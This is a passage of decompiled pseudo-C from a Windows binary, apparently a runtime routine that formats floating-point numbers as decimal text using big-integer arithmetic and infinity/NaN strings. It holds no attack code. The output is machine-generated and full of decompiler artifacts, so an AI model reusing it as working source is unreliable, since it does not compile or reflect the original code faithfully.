				signed int _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				unsigned int _t1172;
				void* _t1176;
				void* _t1177;
				unsigned int _t1178;
				signed int _t1183;
				signed int _t1184;
				signed int _t1186;
				signed int _t1187;
				intOrPtr* _t1189;
				signed int _t1190;
				void* _t1191;
				signed int _t1192;
				signed int _t1193;
				signed int _t1196;
				signed int _t1198;
				signed int _t1199;
				void* _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1203;
				void* _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int* _t1214;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				intOrPtr* _t1220;
				intOrPtr* _t1221;
				signed int _t1223;
				signed int _t1225;
				signed int _t1228;
				signed int _t1234;
				signed int _t1238;
				signed int _t1239;
				void* _t1240;
				signed int _t1244;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1254;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1265;
				signed int _t1266;
				signed int _t1268;
				signed int _t1270;
				signed int _t1272;
				signed int _t1275;
				signed int _t1277;
				signed int* _t1278;
				signed int* _t1281;
				signed int _t1290;

				_t1146 = __edx;
				_t1275 = _t1277;
				_t1278 = _t1277 - 0x964;
				_t743 =  *0x1249004; // 0x5a4607f2
				_v8 = _t743 ^ _t1275;
				_push(__ebx);
				_t1059 = _a20;
				_push(__esi);
				_push(__edi);
				_t1189 = _a16;
				_v1924 = _t1189;
				_v1920 = _t1059;
				E0123AF27( &_v1944, __eflags);
				_t1238 = _a8;
				_t748 = 0x2d;
				if((_t1238 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1189 = _t748;
				 *((intOrPtr*)(_t1189 + 8)) = _t1059;
				_t1190 = _a4;
				if((_t1238 & 0x7ff00000) != 0) {
					L5:
					_t753 = E01237591( &_a4);
					_pop(_t1074);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1074 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t779 = _t754 - 1;
						__eflags = _t779;
						if(_t779 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t780 = _t779 - 1;
							__eflags = _t780;
							if(_t780 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t780 == 1;
								if(_t780 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1190;
									_a8 = _t1238 & 0x7fffffff;
									_t1290 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1192 = _v1896;
									_v1916 = _a12 + 1;
									_t1081 = _t1192 >> 0x14;
									_t786 = _t1081 & 0x000007ff;
									__eflags = _t786;
									if(_t786 != 0) {
										_t1147 = 0;
										_t786 = 0;
										__eflags = 0;
									} else {
										_t1147 = 1;
									}
									_t1193 = _t1192 & 0x000fffff;
									_t1062 = _v1900 + _t786;
									asm("adc edi, esi");
									__eflags = _t1147;
									_t1082 = _t1081 & 0x000007ff;
									_t1244 = _t1082 - 0x434 + (0 | _t1147 != 0x00000000) + 1;
									_v1872 = _t1244;
									E0123D460(_t1082, _t1290);
									_push(_t1082);
									_push(_t1082);
									 *_t1278 = _t1290;
									_t792 = E01240410(E0123D570(), _t1290);
									_v1904 = _t792;
									__eflags = _t792 - 0x7fffffff;
									if(_t792 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t792 - 0x80000000;
										if(_t792 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1062;
									__eflags = _t1193;
									_v464 = _t1193;
									_t1065 = (0 | _t1193 != 0x00000000) + 1;
									_v472 = _t1065;
									__eflags = _t1244;
									if(_t1244 < 0) {
										__eflags = _t1244 - 0xfffffc02;
										if(_t1244 == 0xfffffc02) {
											L101:
											_t794 =  *((intOrPtr*)(_t1275 + _t1065 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1085 = 0;
												__eflags = 0;
											} else {
												_t1085 = _t794 + 1;
											}
											_t795 = 0x20;
											_t796 = _t795 - _t1085;
											__eflags = _t796 - 1;
											_t797 = _t796 & 0xffffff00 | _t796 - 0x00000001 > 0x00000000;
											__eflags = _t1065 - 0x73;
											_v1865 = _t797;
											_t1086 = _t1085 & 0xffffff00 | _t1065 - 0x00000073 > 0x00000000;
											__eflags = _t1065 - 0x73;
											if(_t1065 != 0x73) {
												L107:
												_t798 = 0;
												__eflags = 0;
											} else {
												__eflags = _t797;
												if(_t797 == 0) {
													goto L107;
												} else {
													_t798 = 1;
												}
											}
											__eflags = _t1086;
											if(_t1086 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E0123903C( &_v468, 0x1cc,  &_v1396, 0);
												_t1278 =  &(_t1278[4]);
											} else {
												__eflags = _t798;
												if(_t798 != 0) {
													goto L126;
												} else {
													_t1113 = 0x72;
													__eflags = _t1065 - _t1113;
													if(_t1065 < _t1113) {
														_t1113 = _t1065;
													}
													__eflags = _t1113 - 0xffffffff;
													if(_t1113 != 0xffffffff) {
														_t1262 = _t1113;
														_t1220 =  &_v468 + _t1113 * 4;
														_v1880 = _t1220;
														while(1) {
															__eflags = _t1262 - _t1065;
															if(_t1262 >= _t1065) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1220;
															}
															_t210 = _t1262 - 1; // 0x70
															__eflags = _t210 - _t1065;
															if(_t210 >= _t1065) {
																_t1172 = 0;
																__eflags = 0;
															} else {
																_t1172 =  *(_t1220 - 4);
															}
															_t1220 = _t1220 - 4;
															_t976 = _v1880;
															_t1262 = _t1262 - 1;
															 *_t976 = _t1172 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t976 - 4;
															__eflags = _t1262 - 0xffffffff;
															if(_t1262 == 0xffffffff) {
																break;
															}
															_t1065 = _v472;
														}
														_t1244 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1113;
													} else {
														_t218 = _t1113 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1196 = 1 - _t1244;
											E012333D0(_t1196,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1275 + 0xbad63d) = 1 << (_t1196 & 0x0000001f);
											_t807 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1114 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1114;
											__eflags = _t1065 - _t1114;
											if(_t1065 == _t1114) {
												_t1176 = 0;
												__eflags = 0;
												while(1) {
													_t978 =  *((intOrPtr*)(_t1275 + _t1176 - 0x570));
													__eflags = _t978 -  *((intOrPtr*)(_t1275 + _t1176 - 0x1d0));
													if(_t978 !=  *((intOrPtr*)(_t1275 + _t1176 - 0x1d0))) {
														goto L101;
													}
													_t1176 = _t1176 + 4;
													__eflags = _t1176 - 8;
													if(_t1176 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1177 = 0;
															__eflags = 0;
														} else {
															_t1177 = _t978 + 1;
														}
														_t979 = 0x20;
														_t1263 = _t1114;
														__eflags = _t979 - _t1177 - _t1114;
														_t981 =  &_v460;
														_v1880 = _t981;
														_t1221 = _t981;
														_t171 =  &_v1865;
														 *_t171 = _t979 - _t1177 - _t1114 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1263 - _t1065;
															if(_t1263 >= _t1065) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1221;
															}
															_t175 = _t1263 - 1; // 0x0
															__eflags = _t175 - _t1065;
															if(_t175 >= _t1065) {
																_t1178 = 0;
																__eflags = 0;
															} else {
																_t1178 =  *(_t1221 - 4);
															}
															_t1221 = _t1221 - 4;
															_t985 = _v1880;
															_t1263 = _t1263 - 1;
															 *_t985 = _t1178 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t985 - 4;
															__eflags = _t1263 - 0xffffffff;
															if(_t1263 == 0xffffffff) {
																break;
															}
															_t1065 = _v472;
														}
														__eflags = _v1865;
														_t1115 = _t1114 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1114;
														_t1223 = _t1115 >> 5;
														_v1884 = _t1115;
														_t1265 = _t1223 << 2;
														E012333D0(_t1223,  &_v1396, 0, _t1265);
														 *(_t1275 + _t1265 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t807 = _t1223 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t807;
										_t1068 = 0x1cc;
										_v936 = _t807;
										__eflags = _t807 << 2;
										E0123903C( &_v932, 0x1cc,  &_v1396, _t807 << 2);
										_t1281 =  &(_t1278[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1266 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1266;
										__eflags = _t1065 - _t1266;
										if(_t1065 != _t1266) {
											L53:
											_t996 = _v1872 + 1;
											_t997 = _t996 & 0x0000001f;
											_t1118 = 0x20;
											_v1876 = _t997;
											_t1225 = _t996 >> 5;
											_v1872 = _t1225;
											_v1908 = _t1118 - _t997;
											_t1000 = E012403F0(1, _t1118 - _t997, 0);
											_t1120 =  *((intOrPtr*)(_t1275 + _t1065 * 4 - 0x1d4));
											_t1001 = _t1000 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t1001;
											_v1912 =  !_t1001;
											if( *_t108 == 0) {
												_t1121 = 0;
												__eflags = 0;
											} else {
												_t1121 = _t1120 + 1;
											}
											_t1003 = 0x20;
											_t1004 = _t1003 - _t1121;
											_t1183 = _t1065 + _t1225;
											__eflags = _v1876 - _t1004;
											_v1892 = _t1183;
											_t1005 = _t1004 & 0xffffff00 | _v1876 - _t1004 > 0x00000000;
											__eflags = _t1183 - 0x73;
											_v1865 = _t1005;
											_t1122 = _t1121 & 0xffffff00 | _t1183 - 0x00000073 > 0x00000000;
											__eflags = _t1183 - 0x73;
											if(_t1183 != 0x73) {
												L59:
												_t1006 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1005;
												if(_t1005 == 0) {
													goto L59;
												} else {
													_t1006 = 1;
												}
											}
											__eflags = _t1122;
											if(_t1122 != 0) {
												L81:
												__eflags = 0;
												_t1068 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E0123903C( &_v468, 0x1cc,  &_v1396, 0);
												_t1278 =  &(_t1278[4]);
											} else {
												__eflags = _t1006;
												if(_t1006 != 0) {
													goto L81;
												} else {
													_t1123 = 0x72;
													__eflags = _t1183 - _t1123;
													if(_t1183 >= _t1123) {
														_t1183 = _t1123;
														_v1892 = _t1123;
													}
													_t1016 = _t1183;
													_v1880 = _t1016;
													__eflags = _t1183 - 0xffffffff;
													if(_t1183 != 0xffffffff) {
														_t1184 = _v1872;
														_t1268 = _t1183 - _t1184;
														__eflags = _t1268;
														_t1127 =  &_v468 + _t1268 * 4;
														_v1888 = _t1127;
														while(1) {
															__eflags = _t1016 - _t1184;
															if(_t1016 < _t1184) {
																break;
															}
															__eflags = _t1268 - _t1065;
															if(_t1268 >= _t1065) {
																_t1228 = 0;
																__eflags = 0;
															} else {
																_t1228 =  *_t1127;
															}
															__eflags = _t1268 - 1 - _t1065;
															if(_t1268 - 1 >= _t1065) {
																_t1021 = 0;
																__eflags = 0;
															} else {
																_t1021 =  *(_t1127 - 4);
															}
															_t1024 = _v1880;
															_t1127 = _v1888 - 4;
															_v1888 = _t1127;
															 *(_t1275 + _t1024 * 4 - 0x1d0) = (_t1228 & _v1884) << _v1876 | (_t1021 & _v1912) >> _v1908;
															_t1016 = _t1024 - 1;
															_t1268 = _t1268 - 1;
															_v1880 = _t1016;
															__eflags = _t1016 - 0xffffffff;
															if(_t1016 != 0xffffffff) {
																_t1065 = _v472;
																continue;
															}
															break;
														}
														_t1183 = _v1892;
														_t1225 = _v1872;
														_t1266 = 2;
													}
													__eflags = _t1225;
													if(_t1225 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1225 << 2);
														_t1278 =  &(_t1278[3]);
													}
													__eflags = _v1865;
													_t1068 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1183;
													} else {
														_v472 = _t1183 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1266;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1131 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1275 + _t1131 - 0x570)) -  *((intOrPtr*)(_t1275 + _t1131 - 0x1d0));
												if( *((intOrPtr*)(_t1275 + _t1131 - 0x570)) !=  *((intOrPtr*)(_t1275 + _t1131 - 0x1d0))) {
													goto L53;
												}
												_t1131 = _t1131 + 4;
												__eflags = _t1131 - 8;
												if(_t1131 != 8) {
													continue;
												} else {
													_t1027 = _v1872 + 2;
													_t1028 = _t1027 & 0x0000001f;
													_t1132 = 0x20;
													_t1133 = _t1132 - _t1028;
													_v1888 = _t1028;
													_t1270 = _t1027 >> 5;
													_v1876 = _t1270;
													_v1908 = _t1133;
													_t1031 = E012403F0(1, _t1133, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1032 = _t1031 - 1;
													__eflags = _t1032;
													asm("bsr ecx, edi");
													_v1884 = _t1032;
													_v1912 =  !_t1032;
													if(_t1032 == 0) {
														_t1134 = 0;
														__eflags = 0;
													} else {
														_t1134 = _t1133 + 1;
													}
													_t1034 = 0x20;
													_t1035 = _t1034 - _t1134;
													_t1186 = _t1270 + 2;
													__eflags = _v1888 - _t1035;
													_v1880 = _t1186;
													_t1036 = _t1035 & 0xffffff00 | _v1888 - _t1035 > 0x00000000;
													__eflags = _t1186 - 0x73;
													_v1865 = _t1036;
													_t1135 = _t1134 & 0xffffff00 | _t1186 - 0x00000073 > 0x00000000;
													__eflags = _t1186 - 0x73;
													if(_t1186 != 0x73) {
														L28:
														_t1037 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1036;
														if(_t1036 == 0) {
															goto L28;
														} else {
															_t1037 = 1;
														}
													}
													__eflags = _t1135;
													if(_t1135 != 0) {
														L50:
														__eflags = 0;
														_t1068 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E0123903C( &_v468, 0x1cc,  &_v1396, 0);
														_t1278 =  &(_t1278[4]);
													} else {
														__eflags = _t1037;
														if(_t1037 != 0) {
															goto L50;
														} else {
															_t1138 = 0x72;
															__eflags = _t1186 - _t1138;
															if(_t1186 >= _t1138) {
																_t1186 = _t1138;
																_v1880 = _t1138;
															}
															_t1139 = _t1186;
															_v1892 = _t1139;
															__eflags = _t1186 - 0xffffffff;
															if(_t1186 != 0xffffffff) {
																_t1187 = _v1876;
																_t1272 = _t1186 - _t1187;
																__eflags = _t1272;
																_t1047 =  &_v468 + _t1272 * 4;
																_v1872 = _t1047;
																while(1) {
																	__eflags = _t1139 - _t1187;
																	if(_t1139 < _t1187) {
																		break;
																	}
																	__eflags = _t1272 - _t1065;
																	if(_t1272 >= _t1065) {
																		_t1234 = 0;
																		__eflags = 0;
																	} else {
																		_t1234 =  *_t1047;
																	}
																	__eflags = _t1272 - 1 - _t1065;
																	if(_t1272 - 1 >= _t1065) {
																		_t1049 = 0;
																		__eflags = 0;
																	} else {
																		_t1049 =  *(_v1872 - 4);
																	}
																	_t1144 = _v1892;
																	 *(_t1275 + _t1144 * 4 - 0x1d0) = (_t1049 & _v1912) >> _v1908 | (_t1234 & _v1884) << _v1888;
																	_t1139 = _t1144 - 1;
																	_t1272 = _t1272 - 1;
																	_t1047 = _v1872 - 4;
																	_v1892 = _t1139;
																	_v1872 = _t1047;
																	__eflags = _t1139 - 0xffffffff;
																	if(_t1139 != 0xffffffff) {
																		_t1065 = _v472;
																		continue;
																	}
																	break;
																}
																_t1186 = _v1880;
																_t1270 = _v1876;
															}
															__eflags = _t1270;
															if(_t1270 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1270 << 2);
																_t1278 =  &(_t1278[3]);
															}
															__eflags = _v1865;
															_t1068 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1186;
															} else {
																_v472 = _t1186 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1042 = 4;
													__eflags = 1;
													_v1396 = _t1042;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1042);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1068);
										_push( &_v932);
										E0123903C();
										_t1281 =  &(_t1278[4]);
									}
									_t812 = _v1904;
									_t1088 = 0xa;
									_v1912 = _t1088;
									__eflags = _t812;
									if(_t812 < 0) {
										_t813 =  ~_t812;
										_t814 = _t813 / _t1088;
										_v1880 = _t814;
										_t1089 = _t813 % _t1088;
										_v1884 = _t1089;
										__eflags = _t814;
										if(_t814 == 0) {
											L249:
											__eflags = _t1089;
											if(_t1089 != 0) {
												_t853 =  *(0x12447c4 + _t1089 * 4);
												_v1896 = _t853;
												__eflags = _t853;
												if(_t853 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t853 - 1;
													if(_t853 != 1) {
														_t1100 = _v472;
														__eflags = _t1100;
														if(_t1100 != 0) {
															_t1203 = 0;
															_t1252 = 0;
															__eflags = 0;
															do {
																_t1157 = _t853 *  *(_t1275 + _t1252 * 4 - 0x1d0) >> 0x20;
																 *(_t1275 + _t1252 * 4 - 0x1d0) = _t853 *  *(_t1275 + _t1252 * 4 - 0x1d0) + _t1203;
																_t853 = _v1896;
																asm("adc edx, 0x0");
																_t1252 = _t1252 + 1;
																_t1203 = _t1157;
																__eflags = _t1252 - _t1100;
															} while (_t1252 != _t1100);
															__eflags = _t1203;
															if(_t1203 != 0) {
																_t860 = _v472;
																__eflags = _t860 - 0x73;
																if(_t860 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1275 + _t860 * 4 - 0x1d0) = _t1203;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t814 - 0x26;
												if(_t814 > 0x26) {
													_t814 = 0x26;
												}
												_t1101 =  *(0x124472e + _t814 * 4) & 0x000000ff;
												_v1872 = _t814;
												_v1400 = ( *(0x124472e + _t814 * 4) & 0x000000ff) + ( *(0x124472f + _t814 * 4) & 0x000000ff);
												E012333D0(_t1101 << 2,  &_v1396, 0, _t1101 << 2);
												_t871 = E01240500( &(( &_v1396)[_t1101]), 0x1243e28 + ( *(0x124472c + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x124472f + _t814 * 4) & 0x000000ff) << 2);
												_t1102 = _v1400;
												_t1281 =  &(_t1281[6]);
												_v1892 = _t1102;
												__eflags = _t1102 - 1;
												if(_t1102 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1102 - _v472;
														_t1206 =  &_v1396;
														_t872 = _t871 & 0xffffff00 | _t1102 - _v472 > 0x00000000;
														__eflags = _t872;
														if(_t872 != 0) {
															_t1158 =  &_v468;
														} else {
															_t1206 =  &_v468;
															_t1158 =  &_v1396;
														}
														_v1908 = _t1158;
														__eflags = _t872;
														if(_t872 == 0) {
															_t1102 = _v472;
														}
														_v1876 = _t1102;
														__eflags = _t872;
														if(_t872 != 0) {
															_v1892 = _v472;
														}
														_t1159 = 0;
														_t1254 = 0;
														_v1864 = 0;
														__eflags = _t1102;
														if(_t1102 == 0) {
															L243:
															_v472 = _t1159;
															_t874 = _t1159 << 2;
															__eflags = _t874;
															_push(_t874);
															_t875 =  &_v1860;
															goto L244;
														} else {
															_t1207 = _t1206 -  &_v1860;
															__eflags = _t1207;
															_v1928 = _t1207;
															do {
																_t882 =  *(_t1275 + _t1207 + _t1254 * 4 - 0x740);
																_v1896 = _t882;
																__eflags = _t882;
																if(_t882 != 0) {
																	_t883 = 0;
																	_t1208 = 0;
																	_t1103 = _t1254;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1103 - 0x73;
																		if(_t1103 == 0x73) {
																			goto L258;
																		} else {
																			_t1207 = _v1928;
																			_t1102 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1103 - 0x73;
																			if(_t1103 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1103 - _t1159;
																			if(_t1103 == _t1159) {
																				 *(_t1275 + _t1103 * 4 - 0x740) =  *(_t1275 + _t1103 * 4 - 0x740) & 0x00000000;
																				_t895 = _t883 + 1 + _t1254;
																				__eflags = _t895;
																				_v1864 = _t895;
																				_t883 = _v1888;
																			}
																			_t890 =  *(_v1908 + _t883 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1275 + _t1103 * 4 - 0x740) =  *(_t1275 + _t1103 * 4 - 0x740) + _t890 * _v1896 + _t1208;
																			asm("adc edx, 0x0");
																			_t883 = _v1888 + 1;
																			_t1103 = _t1103 + 1;
																			_v1888 = _t883;
																			_t1208 = _t890 * _v1896 >> 0x20;
																			_t1159 = _v1864;
																			__eflags = _t883 - _v1892;
																			if(_t883 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1208;
																				if(_t1208 == 0) {
																					goto L240;
																				}
																				__eflags = _t1103 - 0x73;
																				if(_t1103 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1103 - _t1159;
																					if(_t1103 == _t1159) {
																						_t558 = _t1275 + _t1103 * 4 - 0x740;
																						 *_t558 =  *(_t1275 + _t1103 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1103 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t888 = _t1208;
																					_t1208 = 0;
																					 *(_t1275 + _t1103 * 4 - 0x740) =  *(_t1275 + _t1103 * 4 - 0x740) + _t888;
																					_t1159 = _v1864;
																					asm("adc edi, edi");
																					_t1103 = _t1103 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1254 - _t1159;
																	if(_t1254 == _t1159) {
																		 *(_t1275 + _t1254 * 4 - 0x740) =  *(_t1275 + _t1254 * 4 - 0x740) & _t882;
																		_t526 = _t1254 + 1; // 0x1
																		_t1159 = _t526;
																		_v1864 = _t1159;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1254 = _t1254 + 1;
																__eflags = _t1254 - _t1102;
															} while (_t1254 != _t1102);
															goto L243;
														}
													} else {
														_t1209 = _v468;
														_v472 = _t1102;
														E0123903C( &_v468, _t1068,  &_v1396, _t1102 << 2);
														_t1281 =  &(_t1281[4]);
														__eflags = _t1209;
														if(_t1209 == 0) {
															goto L203;
														} else {
															__eflags = _t1209 - 1;
															if(_t1209 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1104 = 0;
																	_v1896 = _v472;
																	_t1255 = 0;
																	__eflags = 0;
																	do {
																		_t904 = _t1209;
																		_t1160 = _t904 *  *(_t1275 + _t1255 * 4 - 0x1d0) >> 0x20;
																		 *(_t1275 + _t1255 * 4 - 0x1d0) = _t904 *  *(_t1275 + _t1255 * 4 - 0x1d0) + _t1104;
																		asm("adc edx, 0x0");
																		_t1255 = _t1255 + 1;
																		_t1104 = _t1160;
																		__eflags = _t1255 - _v1896;
																	} while (_t1255 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1210 = _v1396;
													__eflags = _t1210;
													if(_t1210 != 0) {
														__eflags = _t1210 - 1;
														if(_t1210 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1105 = 0;
																_v1896 = _v472;
																_t1256 = 0;
																__eflags = 0;
																do {
																	_t909 = _t1210;
																	_t1161 = _t909 *  *(_t1275 + _t1256 * 4 - 0x1d0) >> 0x20;
																	 *(_t1275 + _t1256 * 4 - 0x1d0) = _t909 *  *(_t1275 + _t1256 * 4 - 0x1d0) + _t1105;
																	asm("adc edx, 0x0");
																	_t1256 = _t1256 + 1;
																	_t1105 = _t1161;
																	__eflags = _t1256 - _v1896;
																} while (_t1256 != _v1896);
																L208:
																__eflags = _t1104;
																if(_t1104 == 0) {
																	goto L245;
																} else {
																	_t907 = _v472;
																	__eflags = _t907 - 0x73;
																	if(_t907 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E0123903C( &_v468, _t1068,  &_v2404, 0);
																		_t1281 =  &(_t1281[4]);
																		_t878 = 0;
																	} else {
																		 *(_t1275 + _t907 * 4 - 0x1d0) = _t1104;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t875 =  &_v2404;
														L244:
														_push(_t875);
														_push(_t1068);
														_push( &_v468);
														E0123903C();
														_t1281 =  &(_t1281[4]);
														L245:
														_t878 = 1;
													}
												}
												L246:
												__eflags = _t878;
												if(_t878 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t856 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t814 = _v1880 - _v1872;
												__eflags = _t814;
												_v1880 = _t814;
											} while (_t814 != 0);
											_t1089 = _v1884;
											goto L249;
										}
									} else {
										_t912 = _t812 / _t1088;
										_v1908 = _t912;
										_t1106 = _t812 % _t1088;
										_v1896 = _t1106;
										__eflags = _t912;
										if(_t912 == 0) {
											L184:
											__eflags = _t1106;
											if(_t1106 != 0) {
												_t1211 =  *(0x12447c4 + _t1106 * 4);
												__eflags = _t1211;
												if(_t1211 != 0) {
													__eflags = _t1211 - 1;
													if(_t1211 != 1) {
														_t913 = _v936;
														_v1896 = _t913;
														__eflags = _t913;
														if(_t913 != 0) {
															_t1257 = 0;
															_t1107 = 0;
															__eflags = 0;
															do {
																_t914 = _t1211;
																_t1165 = _t914 *  *(_t1275 + _t1107 * 4 - 0x3a0) >> 0x20;
																 *(_t1275 + _t1107 * 4 - 0x3a0) = _t914 *  *(_t1275 + _t1107 * 4 - 0x3a0) + _t1257;
																asm("adc edx, 0x0");
																_t1107 = _t1107 + 1;
																_t1257 = _t1165;
																__eflags = _t1107 - _v1896;
															} while (_t1107 != _v1896);
															__eflags = _t1257;
															if(_t1257 != 0) {
																_t917 = _v936;
																__eflags = _t917 - 0x73;
																if(_t917 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1275 + _t917 * 4 - 0x3a0) = _t1257;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t912 - 0x26;
												if(_t912 > 0x26) {
													_t912 = 0x26;
												}
												_t1108 =  *(0x124472e + _t912 * 4) & 0x000000ff;
												_v1888 = _t912;
												_v1400 = ( *(0x124472e + _t912 * 4) & 0x000000ff) + ( *(0x124472f + _t912 * 4) & 0x000000ff);
												E012333D0(_t1108 << 2,  &_v1396, 0, _t1108 << 2);
												_t930 = E01240500( &(( &_v1396)[_t1108]), 0x1243e28 + ( *(0x124472c + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x124472f + _t912 * 4) & 0x000000ff) << 2);
												_t1109 = _v1400;
												_t1281 =  &(_t1281[6]);
												_v1892 = _t1109;
												__eflags = _t1109 - 1;
												if(_t1109 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1109 - _v936;
														_t1214 =  &_v1396;
														_t931 = _t930 & 0xffffff00 | _t1109 - _v936 > 0x00000000;
														__eflags = _t931;
														if(_t931 != 0) {
															_t1166 =  &_v932;
														} else {
															_t1214 =  &_v932;
															_t1166 =  &_v1396;
														}
														_v1876 = _t1166;
														__eflags = _t931;
														if(_t931 == 0) {
															_t1109 = _v936;
														}
														_v1880 = _t1109;
														__eflags = _t931;
														if(_t931 != 0) {
															_v1892 = _v936;
														}
														_t1167 = 0;
														_t1259 = 0;
														_v1864 = 0;
														__eflags = _t1109;
														if(_t1109 == 0) {
															L177:
															_v936 = _t1167;
															_t933 = _t1167 << 2;
															__eflags = _t933;
															goto L178;
														} else {
															_t1215 = _t1214 -  &_v1860;
															__eflags = _t1215;
															_v1928 = _t1215;
															do {
																_t941 =  *(_t1275 + _t1215 + _t1259 * 4 - 0x740);
																_v1884 = _t941;
																__eflags = _t941;
																if(_t941 != 0) {
																	_t942 = 0;
																	_t1216 = 0;
																	_t1110 = _t1259;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1110 - 0x73;
																		if(_t1110 == 0x73) {
																			goto L187;
																		} else {
																			_t1215 = _v1928;
